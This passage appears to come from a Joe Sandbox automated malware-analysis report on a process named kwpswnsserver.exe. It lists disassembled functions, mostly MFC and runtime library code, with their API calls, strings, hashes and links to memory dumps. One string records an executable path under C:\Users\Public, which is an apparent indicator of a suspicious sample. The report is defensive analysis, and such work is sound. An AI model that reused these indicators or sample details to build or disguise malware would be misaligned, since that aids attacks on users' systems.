                                                                  • Instruction ID: b7303d95587910ccd99f268d814fe1533e64dc31ca8531104a6570f2369328bf
                                                                  • Opcode Fuzzy Hash: 61336d290a36d988d9de5819971cde883f4723b30e2a9ac93902e03256a96baa
                                                                  • Instruction Fuzzy Hash: DD01F93330DB629E971E1975DC845EB2778EB6627D361C32AE31062DD1EF11D8064188
                                                                  Function 6C9D895F Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 6C9D8A7E
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 6C9D8CF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2673424686-393685449
                                                                  • Opcode ID: 8cf6a241d77f8fdf08a5d8011232d3e0f8d904b55e2db21fff13e16969afb4d0
                                                                  • Instruction ID: a2ffdb0fc74c27bdb4fb08cb983eb8a99ad08d4bb946c94bc444d76d6bd5ac1d
                                                                  • Opcode Fuzzy Hash: 8cf6a241d77f8fdf08a5d8011232d3e0f8d904b55e2db21fff13e16969afb4d0
                                                                  • Instruction Fuzzy Hash: 70B1A071901A09DFCF08CFA4D84099EB7B9BF24308F16959BE8107BA12D331EA51CBD9
                                                                  Function 6C8A01FD Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A0216
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 6C8A0221
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A0231
                                                                  • GetWindowRect.USER32(00000000,?), ref: 6C8A024A
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8A025A
                                                                  • GetWindow.USER32(?,00000005), ref: 6C8A0267
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: d26576bcee23f3ae47eeae2145a90a545a0ca25c295ec5bdf03b2aa4eda7829c
                                                                  • Instruction ID: eb3dc0c4a4e4471223480cbc3f8fb41e272aa588cf01e3ab67563f6ccd4e0ba3
                                                                  • Opcode Fuzzy Hash: d26576bcee23f3ae47eeae2145a90a545a0ca25c295ec5bdf03b2aa4eda7829c
                                                                  • Instruction Fuzzy Hash: CB018831A0536AABDF26DFA8CD14EDF7778EF06309F508615F416E6140DB30DA468791
                                                                  Function 6C8A00A7 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 6C8A00AB
                                                                    • Part of subcall function 6C8A0147: GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
                                                                    • Part of subcall function 6C8A0147: GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
                                                                    • Part of subcall function 6C8A0147: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
                                                                  • GetParent.USER32(00000000), ref: 6C8A00CC
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A00EB
                                                                  • GetParent.USER32(00000000), ref: 6C8A00F9
                                                                  • GetDesktopWindow.USER32 ref: 6C8A0101
                                                                  • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C8A0115
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                                  • String ID:
                                                                  • API String ID: 1233893325-0
                                                                  • Opcode ID: 9b7672d3b620b2e51ecd979df298bab07afa962df2bdaeec816f24043e0ebd19
                                                                  • Instruction ID: 316e05d73b1733fd70a9f5c6269e1c8d9b1e74544b00f95a4c2449e4e6ec2dbd
                                                                  • Opcode Fuzzy Hash: 9b7672d3b620b2e51ecd979df298bab07afa962df2bdaeec816f24043e0ebd19
                                                                  • Instruction Fuzzy Hash: DCF0F93134137167D6363A658ED9BEE35785B86F59F204A24F92BE7680DB24C4034150
                                                                  Function 6C8B05F2 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C8B05FC
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CtrlH_prolog3H_prolog3_catch
                                                                  • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars
                                                                  • API String ID: 905329913-3577816979
                                                                  • Opcode ID: 59a0db12837ec05dcde8fc8b021b9d921f6f0200b86c3f61eabef0ca0238a441
                                                                  • Instruction ID: 63373548723f753774a3cc8268270a5c0de79dfd5c73bb69db3d4dc0fb767b0e
                                                                  • Opcode Fuzzy Hash: 59a0db12837ec05dcde8fc8b021b9d921f6f0200b86c3f61eabef0ca0238a441
                                                                  • Instruction Fuzzy Hash: EF916D70A0020D9FCF24DF94CA84AEEB7B6BF89304F144468E415BB791DB31AD05CB61
                                                                  Function 6C8C897B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C8982
                                                                  • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000,?,?,?,?,?,?,?,0000001C), ref: 6C8C89B6
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 6C8C89D8
                                                                  • DrawThemeBackground.UXTHEME(00000000,?,00000003,00000000,?,00000000,?,?,?,?,?,?,?,?,0000001C), ref: 6C8C8A10
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: BackgroundDrawTheme$H_prolog3_InflateRect
                                                                  • String ID: %d%%
                                                                  • API String ID: 1553386484-1518462796
                                                                  • Opcode ID: 86f1f510c5ff1cde69290aec14f1afc6f00f7a1438e076aa8adc04de3662da46
                                                                  • Instruction ID: b57b118bdbbbc79ea8869f21c24a0c0e4290701ffc90e2fa87869053278c7494
                                                                  • Opcode Fuzzy Hash: 86f1f510c5ff1cde69290aec14f1afc6f00f7a1438e076aa8adc04de3662da46
                                                                  • Instruction Fuzzy Hash: D0415872A102099FCB14CF98CD84BDE77B9BF49305F144969E501AB690DB70E905CBA0
                                                                  Function 6C89442F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C894439
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • swprintf.LIBCMT ref: 6C89448E
                                                                  • swprintf.LIBCMT ref: 6C894532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: swprintf$H_prolog3_LongWindow
                                                                  • String ID: - $:%d
                                                                  • API String ID: 524023746-2359489159
                                                                  • Opcode ID: f3234017a2f7af4934c8d05fee391690a639cb4640ec94e0ef0945d35d31acb5
                                                                  • Instruction ID: f169d94d2b3f415846dfd09eaa3b58ffed201bcfdde4a3f126b4077685d21422
                                                                  • Opcode Fuzzy Hash: f3234017a2f7af4934c8d05fee391690a639cb4640ec94e0ef0945d35d31acb5
                                                                  • Instruction Fuzzy Hash: EF31A5729015146AD724D7E8DE50FEEB32CFF15204F0048A5A629A7E91EB30EE49CBA0
                                                                  Function 6C9C4BED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, xrefs: 6C9C4C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                  • API String ID: 0-3797387628
                                                                  • Opcode ID: 6a12a76442e1da8e64df073ebb49c81abda17de8f15167b76afd5832aeeed000
                                                                  • Instruction ID: c99cdada7fa32d54756f9b29bc6564e96b9d4eb21792bda4bf96369e5a450e94
                                                                  • Opcode Fuzzy Hash: 6a12a76442e1da8e64df073ebb49c81abda17de8f15167b76afd5832aeeed000
                                                                  • Instruction Fuzzy Hash: 4921CD32348216AFD7109F76CD809EB77ACAF653687048624E918D7A60EB31ED008F63
                                                                  Function 6C8A6C9A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A6CE1
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6C8A6CF1
                                                                    • Part of subcall function 6C89B69C: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89B6AF
                                                                    • Part of subcall function 6C89B69C: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6C89B6BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                  • API String ID: 1646373207-2191092095
                                                                  • Opcode ID: 0e0d7c62e2eeecdda0fbc00978acbe1ec29bf1c3f0d5e3bcbacc1c1af3376be7
                                                                  • Instruction ID: 44806412eaae56886e732f03fb8b104412a363a41cc581de748d5a5c7396203b
                                                                  • Opcode Fuzzy Hash: 0e0d7c62e2eeecdda0fbc00978acbe1ec29bf1c3f0d5e3bcbacc1c1af3376be7
                                                                  • Instruction Fuzzy Hash: E411E675644316AFDF258F58CD04B49BB74FB0A759F00C92AE806D3A44CB32A902CB80
                                                                  Function 6C8AA0CF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8AA0D6
                                                                  • GetClassNameW.USER32(?,00000000,00000400), ref: 6C8AA107
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 6C8AA140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassH_prolog3LongNameWindow
                                                                  • String ID: ComboBox$ComboBoxEx32
                                                                  • API String ID: 297531199-1907415764
                                                                  • Opcode ID: 561b4fc4f45905c8d86b683e0aa6443437f1afe6beda7223a02062b6052cd0cc
                                                                  • Instruction ID: 0dec5c2cf35d320be588b9248c9c5f5850ff2ef46c756498929bdb957ba7cc43
                                                                  • Opcode Fuzzy Hash: 561b4fc4f45905c8d86b683e0aa6443437f1afe6beda7223a02062b6052cd0cc
                                                                  • Instruction Fuzzy Hash: BF018475515626AADB249A94CE14BEEB774BF2132CF101D24E111A2EC0EF35E81DCA64
                                                                  Function 6C90641D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C90643F
                                                                  • LoadResource.KERNEL32(00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C90644D
                                                                  • LockResource.KERNEL32(00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C906458
                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C906466
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID: PNG
                                                                  • API String ID: 3473537107-364855578
                                                                  • Opcode ID: 64e5896d6def802a47d7c20ac4399b3267a0269c009dc9aa9424712841e819a9
                                                                  • Instruction ID: 024a38b86f12b5c13cae2f12d64e7e95ed5a6ad2a180117e75672339c89d86cd
                                                                  • Opcode Fuzzy Hash: 64e5896d6def802a47d7c20ac4399b3267a0269c009dc9aa9424712841e819a9
                                                                  • Instruction Fuzzy Hash: 9DF06276702622BF5B116BA98C1CCAF767DEE966A93118229FD45E3600DB30DD81C6B0
                                                                  Function 6C8A66C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A66FC
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 6C8A66E5
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A66EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmDefWindowProc$dwmapi.dll
                                                                  • API String ID: 1102202064-234806475
                                                                  • Opcode ID: 1a24e1b3c500a578ab9d158c35347af7676f925c8665971b7256a013cdb3208f
                                                                  • Instruction ID: 4f1e38aa3fda46f9a1acb67d232757c56c3ea251c7ddcc9b8ad46c14df7c3076
                                                                  • Opcode Fuzzy Hash: 1a24e1b3c500a578ab9d158c35347af7676f925c8665971b7256a013cdb3208f
                                                                  • Instruction Fuzzy Hash: 21F0963661532BAFCF256FB8DD1885A3FB4FB0A7A43018921FC05D2614DB30C8128BA0
                                                                  Function 6C8A68AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A68E3
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6C8A68CC
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A68D5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                  • String ID: DwmSetIconicLivePreviewBitmap$dwmapi.dll
                                                                  • API String ID: 1102202064-1757063745
                                                                  • Opcode ID: a53b0c408b141a28544a4894593eb2bd7b9084268c19413dffcf1f1526af5e9d
                                                                  • Instruction ID: ad8ee207ca0b48c9f0bf9045277ec0e65e761e5b3fd957e14f93c231a7e1c00e
                                                                  • Opcode Fuzzy Hash: a53b0c408b141a28544a4894593eb2bd7b9084268c19413dffcf1f1526af5e9d
                                                                  • Instruction Fuzzy Hash: 9AF02B3160133FAF8F252FA8CD1C85A3FB8BF053547058920FC15D6604E734C8128BA0
                                                                  Function 6C8A6787 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A67C0
                                                                    • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                    • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                    • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6C8A67A9
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A67B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
